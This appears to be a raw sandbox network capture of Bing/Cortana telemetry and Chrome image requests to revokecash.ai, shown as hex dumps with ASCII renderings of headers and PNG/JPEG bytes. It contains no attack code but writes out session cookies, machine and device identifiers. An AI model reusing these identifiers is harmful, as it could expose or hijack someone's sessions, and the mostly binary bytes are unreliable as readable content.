                                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                          X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                          X-Device-isOptin: false
                                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                          X-Device-OSSKU: 48
                                                                          X-Device-Touch: false
                                                                          X-DeviceID: 01000A410900D492
                                                                          X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                          X-MSEdge-ExternalExpType: JointCoord
                                                                          X-PositionerType: Desktop
                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                          X-Search-CortanaAvailableCapabilities: None
                                                                          X-Search-SafeSearch: Moderate
                                                                          X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                          X-UserAgeClass: Unknown
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: www.bing.com
                                                                          Content-Length: 2483
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1702226635819&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                          2023-12-10 16:44:28 UTC1OUTData Raw: 3c
                                                                          Data Ascii: <
                                                                          2023-12-10 16:44:28 UTC2482OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                          Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                          2023-12-10 16:44:29 UTC476INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 70 74 2d 43 48 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a 58 2d 4d 53 45 64 67 65 2d 52 65 66 3a 20 52 65
                                                                          Data Ascii: HTTP/1.1 204 No ContentAccess-Control-Allow-Origin: *Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionX-MSEdge-Ref: Re


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.2.549777104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:29 UTC595OUTGET /_img/boring-security.png HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC711INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 37 39 35 36 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 35 63 61 61 65 2d 31 38 63 35 33 33 32 35 39 61 38
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/pngContent-Length: 379566Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:37 GMTETag: W/"5caae-18c533259a8
                                                                          2023-12-10 16:44:30 UTC658INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 3c 00 00 01 14 08 02 00 00 00 61 f4 a4 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e 4c bc db 92 23 39 92 25 a8 57 c0 8c f4 88 c8 ac ac aa de ae ea 5e d9 d9 4f 58 99 ff ff 96 bd cc c3 c8 76 77 65 44 b8 93 66 00 f4 32 0f 6a f4 4a 3e 84 30 e8 46 23 0c 80 aa 1e 3d 7a 14 f8 df ff fb ff 05 00 cc 12 00 e9 9e 19 66 46 cc ee 96 91 44 a4 aa da 9b ad 95 99 90 88 88 09 49 4c 10 e8 61 11 be cc 10 60 db ef b6 4c 98 08 71 cc 85 8c cc 1c 09 c2 0c 09 ee c6 c2 11 0e 89 11 19 ee 44 84 88 ac 02 90 00 08 88 19 41 c4 cc 34 e7 50 95 d6 da 5a 8e 88 44 68 66 b6 5c 55 3c 82 89 00 73 2d cf 48 22 64 61 44 cc 8c ba 21 22 66 42 42 86 7b 04 10 33 11 84 3b 00 04 00 13 33 21 22 46 a6 bb 13 d2 eb 8b 84 88
                                                                          Data Ascii: PNGIHDR<asRGB IDATx^L#9%W^OXvweDf2jJ>0F#=zfFDILa`LqDA4PZDhf\U<s-H"daD!"fBB{3;3!"F
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: be 7e 99 6b ba 1b 78 0e b3 d6 34 23 91 90 99 3e 3e 1e fb b6 69 eb 66 eb e3 fd fd cf 7f f9 ab a0 7c 1c ef 6b ae fb 76 3f c7 93 48 fa b6 99 1b 66 90 70 99 89 9b af 35 91 e8 38 0e 11 01 c4 6f 5f be 34 6d 73 9a f9 62 91 cc 84 04 51 b1 65 09 79 9e e7 c7 c7 fb 7d df bf 7d fb f6 e3 e3 fd eb 97 af ee fe 7c 3e 6b df 22 40 df fa 5a e6 ee ad 35 37 8f 8c b5 96 b9 09 0b 11 ed fb be 56 30 13 40 44 44 57 85 84 39 c6 b6 ef bd f5 b1 16 32 32 f0 98 e7 39 c7 d6 b7 65 4b 89 11 e9 79 3e 3d a2 35 15 69 90 88 18 88 44 48 84 18 19 6e 16 ee 01 c0 4c 84 ec 6e 11 e1 90 5d 3a b3 04 e4 b2 91 0e c8 98 e9 08 44 4c 00 60 6e 90 50 2f 77 37 33 44 04 00 44 6c ad 3d 1e 8f de 37 26 1e e3 e8 5b cf 84 f0 24 66 55 45 cc f3 3c dd 7c d9 12 11 66 3e cf b3 0c 10 00 3e 3e 3e f6 7d 8f 88 cc 9c 73 22
                                                                          Data Ascii: ~kx4#>>if|kv?Hfp58o_4msbQey}}|>k"@Z57V0@DDW9229eKy>=5iDHnLn]:DL`nP/w73DDl=7&[$fUE<|f>>>>}s"
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 6f 2a 44 d8 a4 01 c1 e3 f1 4e 88 aa 3d c2 c7 18 fb 7e 3b 8e 27 22 fe f2 f5 1b 22 21 52 64 8c 31 09 69 db b6 f3 3c cd dd 23 10 b0 9e f4 79 3c cd bc b5 2e 44 73 ce 7d df 45 45 90 b1 00 13 00 02 46 84 6a 33 f7 b5 6c d8 0a 8f 39 c6 b0 d9 da 95 f0 10 d2 39 07 20 a8 2a 00 f5 d6 20 e1 18 c7 ad df 98 69 8c 53 44 44 d5 dd bb 36 48 d0 a6 ee 4e 4c 48 bc b5 ae 5d cd 8c 08 6f b7 3b 13 21 12 20 ac 69 11 a1 2c 1e 5e 46 14 11 db b6 5d d6 2d 42 c4 22 12 1e 80 00 90 fb 7e 6f 4d 89 58 a5 45 c4 e3 f9 20 e6 de 3b 11 aa 6a 59 62 6b 0d 11 cb bb 96 a1 d5 87 aa da 9a 26 a4 b0 34 6d 3f 7f be df 6e 77 66 26 a4 e7 f3 c9 c4 b6 5c 44 b4 89 88 3e 9f 47 39 e7 b9 ec 38 9f 84 64 be ce f3 54 6d 05 68 12 82 85 08 39 2a 6c 20 22 60 84 03 c2 9c f3 33 1d dd f6 0d 91 f6 fd a6 a2 44 f4 a7 3f fd
                                                                          Data Ascii: o*DN=~;'""!Rd1i<#y<.Ds}EEFj3l99 * iSDD6HNLH]o;! i,^F]-B"~oMXE ;jYbk&4m?nwf&\D>G98dTmh9*l "`3D?
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 20 a9 92 13 66 5e 3e 97 cd ad ef 08 24 4a 11 17 fb 82 88 11 61 66 aa 4d b5 8b d4 fe 37 2d 6a fc da 9f 42 c4 ad 35 4c 24 62 c0 6c da 99 c5 7c 20 12 93 dc ef 6f 2c f4 3c 9f ee 2b 13 98 34 d3 dd 0c 00 01 e1 f1 78 d8 5a 7d df be 7f ff 47 44 de ef 37 77 57 6d c8 90 e1 00 20 ca 90 a8 da 98 b4 48 44 22 8a f0 c7 f3 e3 e7 cf 8f 73 9c c4 24 ac e6 cb 96 95 83 5a 6b 11 63 d3 36 e7 b2 98 aa 4d a5 95 93 89 88 65 83 85 21 f1 fd fb 7f f5 d6 01 38 23 d6 5a 65 f5 bd f7 31 46 f9 a2 f3 3c f3 e5 90 2f e7 09 e0 ee e5 1b cb f3 94 cb aa bf 7e a6 31 c5 46 37 d5 c8 04 84 71 0e 44 5c 6b 15 1f 59 df ad cb 8a 07 ca cc 7a 8f 7f 48 62 8f e3 10 e6 d6 fb 5a ab 00 47 cd 7f 21 8f 7c 45 cd 39 e7 5a ab d8 cd 39 cf d6 3a 22 42 a5 66 44 73 ce 32 d5 62 f5 3e d1 4c 8d b9 b5 46 04 73 0e 24 66 40
                                                                          Data Ascii: f^>$JafM7-jB5L$bl| o,<+4xZ}GD7wWm HD"s$Zkc6Me!8#Ze1F</~1F7qD\kYzHbZG!|E9Z9:"BfDs2b>LFs$f@
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: ad b5 88 e8 c7 8f 1f e5 03 23 22 bc 4a 66 e5 51 e3 d3 d1 15 85 56 c8 26 22 d6 9a 95 06 d7 8c 15 f6 da b6 ad e8 ba ad 6f 66 f6 78 3c f4 25 e4 00 80 42 84 88 28 22 05 e0 0a 7e d5 14 d5 27 a2 52 79 6b a6 27 84 b2 96 3b 95 4b f5 91 f8 07 c8 c8 cc db b6 bd 74 17 17 13 56 17 d4 d3 d5 65 6b ad cf c1 57 0d a7 36 03 13 9f e3 64 6d f7 db ad 70 9e bc d8 ca ae fa 89 26 2b c8 8a ea 72 67 96 08 ab 38 18 99 44 57 a8 56 22 84 5c 66 ee 06 99 f5 95 39 06 20 46 84 47 00 a2 20 fe f8 f1 a3 f8 aa 5b df 7a 53 ad 82 26 61 66 9e 73 46 d5 af 22 54 a4 18 42 44 54 e6 70 af 50 12 11 6f db de 5b 2b 18 c7 84 cb d6 39 a7 87 db ab 4e 5d 21 ac a6 cb dd 09 11 32 d7 f2 cc 84 cc b5 cc 23 dd 2c 21 b5 35 65 62 66 40 5c cb cd 97 aa b6 d6 32 21 dc 59 d4 c3 59 08 32 99 45 98 89 d1 dd 5a 6b 6f 6f
                                                                          Data Ascii: #"JfQV&"ofx<%B("~'Ryk';KtVekW6dmp&+rg8DWV"\f9 FG [zS&afsF"TBDTpPo[+9N]!2#,!5ebf@\2!YY2EZkoo
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 45 10 49 b4 a9 2a 8b 44 c4 18 03 01 6a 6a ca 4d 13 42 19 39 00 54 88 67 e6 63 0c 77 07 44 61 41 80 65 7e 9e 67 e9 66 6a 6e c3 dd dd 11 a0 60 dc 9c 2b 5f c8 95 90 90 10 32 b4 35 44 54 91 2a 01 47 5c b2 b0 d6 7b 6b 97 c0 c6 8b fa 05 f0 f0 7d db bb 6a d5 46 8a 89 9c 6b 21 24 fd a1 36 7d 3c 8f cc 64 26 0f a8 d9 0b 8f 44 28 95 59 49 ea 91 88 89 dc 9d a5 94 94 5e 1b 18 11 ea ba cc c0 44 0b cf 48 00 70 f7 30 07 00 20 2a 76 dc 3d 20 f3 ca a1 89 7b 6b 6e 06 00 aa ed 02 50 08 11 c5 b9 00 21 42 d5 43 19 23 a2 50 03 66 12 2b 11 b9 5b 78 22 31 24 20 b1 36 46 a2 70 47 64 04 cc c8 17 c1 cd 00 c0 44 08 49 42 d7 8f 03 86 07 13 69 ef 54 14 72 29 7f 00 ca ef 45 26 ff fb bf ff 3d 22 4a aa 4c 24 da 1a bc d2 85 eb de cc 85 3d 01 00 09 dd c3 dd a0 d4 00 48 2c 1c 19 90 99 97 66
                                                                          Data Ascii: EI*DjjMB9TgcwDaAe~gfjn`+_25DT*G\{k}jFk!$6}<d&D(YI^DHp0 *v= {knP!BC#Pf+[x"1$ 6FpGdDIBiTr)E&="JL$=H,f
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 54 ec f6 08 e5 4b 9e 85 00 ee c6 ff fe 7f fc ef 91 e1 66 cc 4c 58 bf ea 40 22 4c 2f ae a8 b1 32 21 88 2a b3 ac 65 88 a0 4d 3d 9c 58 44 04 01 ae 7d 8f 44 88 3f 1f cf e7 39 88 70 7b d5 d7 6a bb 23 62 26 66 a6 a7 13 52 46 a8 2a 33 85 9b 79 54 7d da 5f f2 82 4c 27 a2 c8 0c 0b 37 47 4c 51 1e c7 09 88 09 90 1e 88 e0 01 9f a6 55 d6 15 09 08 50 5e 1b 11 eb bd 30 17 aa b8 e6 88 c9 dc dc 3c 81 08 91 99 dc c3 ac a8 32 28 80 f4 62 50 a0 0a f6 11 20 c2 66 11 11 00 59 19 83 aa 20 91 9b 05 e4 e7 b6 70 77 ba aa 30 61 af 62 56 44 24 80 56 df 07 33 b3 64 3a 24 88 6a c1 b5 42 42 88 d8 5a 43 84 f3 9c bd b7 42 87 db be 7b 44 59 bb 99 e7 eb 41 ea 8b 45 bc 13 11 22 8a 5c 8a 99 84 0b 59 9a 19 11 d5 60 86 cd 39 ed 2c df 1a 11 11 35 b0 ca ff 6a f9 44 2e ab 3b 8e 43 5b 8b 88 f3 3c
                                                                          Data Ascii: TKfLX@"L/2!*eM=XD}D?9p{j#b&fRF*3yT}_L'7GLQUP^0<2(bP fY pw0abVD$V3d:$jBBZCB{DYAE"\Y`9,5jD.;C[<
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: e7 06 fa 43 c7 25 be b6 08 42 e9 f1 c1 dd 01 2e b6 bc 32 8c b2 ff 82 47 c2 5c cd 1a 35 8c b8 40 9b b5 76 15 5b 89 ae 96 91 f2 2f af 27 0b 61 45 22 15 61 ae ca 23 ac eb ac 96 3c 8e 13 90 5e 1f 4e 00 30 33 11 cd cc 65 ce cc e5 c5 ea 02 42 2c 1c a6 ad dd ee f7 8c a0 17 52 2c 87 18 11 ee d7 b0 4b cc 21 2f 69 48 c1 e6 ad 6f 4c 6c b6 f2 c5 cc 8b b4 08 af 1e b7 cc 00 c0 d6 1a 40 94 43 57 d5 4c 6f 4d 5a db 10 d3 cd 5a 6f 73 8e da 18 73 2e 11 56 6d e7 79 30 13 13 32 13 64 f6 ad 6f 7d 27 44 c2 d2 0a 0b 61 da 9a d5 5f fd 0a 8d 04 80 11 51 47 c9 10 a2 85 33 42 6f 62 19 e1 b6 6d dd c3 3d 80 95 9b 72 ac d5 b6 2d 13 e6 74 8f e8 bd cf b1 22 42 54 dd a3 b5 9e 18 99 c0 24 48 89 78 59 20 4b 23 04 5b cb dc 55 34 13 dc d2 dd 81 2f 16 96 85 9e 1f 67 a6 ab 6a ef db fb cf c7 fd
                                                                          Data Ascii: C%B.2G\5@v[/'aE"a#<^N03eB,R,K!/iHoLl@CWLoMZZoss.Vmy02do}'Da_QG3Bobm=r-t"BT$HxY K#[U4/gj
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 51 b2 95 cc 64 12 00 c8 0c 24 11 a2 cc 68 b7 9d 90 98 08 20 13 d2 dc e6 9c 88 50 79 12 14 e3 93 84 40 cc ec 11 22 fc cb 2f bf 1e e7 61 6b 54 09 ac 60 81 aa 8e 31 dc 7d df f7 cc 44 8f e3 1c b7 fb ed fe 76 87 57 43 d6 79 9c e1 7e bb dd b6 db 5e b5 a7 c8 64 11 22 f6 08 9f 6b 8e 51 32 ed 8c 18 15 fc 98 e6 9a f4 aa b7 26 c4 3c 8f b5 cc 33 cd ad a9 5e b9 0e e0 d6 b7 d2 90 d5 f6 ab bd b1 7c 09 4b d9 40 75 00 00 22 12 f6 6d 1f f3 44 24 61 9d 36 c3 fd e3 fd c3 cc 88 69 eb db 58 73 ae d9 5b 7f 1c 4f 20 78 7b fb 12 01 01 4e 88 10 10 11 6b 8d 84 24 91 c8 1c 6b 30 f3 fb fb cf c8 d8 f6 9b bb bd bd dd bf ff fe bb 9b 6d db 96 99 ad 35 80 3c cf a3 8c d2 5e 1a 23 11 c1 cc 5f be fe 7a df ef 00 b0 d6 bc 1c 32 2b 41 de f6 bb 6a 8f da 12 da c2 23 21 9a b6 12 fc a9 e8 56 3a cb
                                                                          Data Ascii: Qd$h Py@"/akT`1}DvWCy~^d"kQ2&<3^|K@u"mD$a6iXs[O x{Nk$k0m5<^#_z2+Aj#!V:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.549788104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:30 UTC586OUTGET /_img/vulcan.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC710INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 38 37 66 2d 31 38 63 35 33 33 32 35 62 62 38 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/jpegContent-Length: 10367Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"287f-18c53325bb8"
                                                                          2023-12-10 16:44:30 UTC659INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20 43 6f
                                                                          Data Ascii: w.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Co
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46 22 46
                                                                          Data Ascii: ))8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF"F
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 0c 03 01 00 02 11 03 11 00 00 01 a6 0e d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ed 5e 2f 79 b3 1d 90 5c 76 49 71 99 31 18 e2 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 6a d6 1f 57 9f 73 f5 ac ae ed 76 fa a3 b1 da f7 e9 40 9c f5 e8 18 1e 7e 97 d1 46 d9 6b 6f 7c 3c da 4a fd b2 a7 ad 07 3e 63 3c c0 6c f0 17 cc 21 eb 9c 6b 19 d8 20 00 1b 6b a6 6f 35 5a 6a da 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 eb e7 79 a9 8d ad 89 2c 4d c4 7a f3 49 f3 de 68 fc 9d 2e 39 1e 1e fd
                                                                          Data Ascii: ^/y\vIq1@ZjWsv@~Fko|<J>c<l!k ko5Zjy,MzIh.9
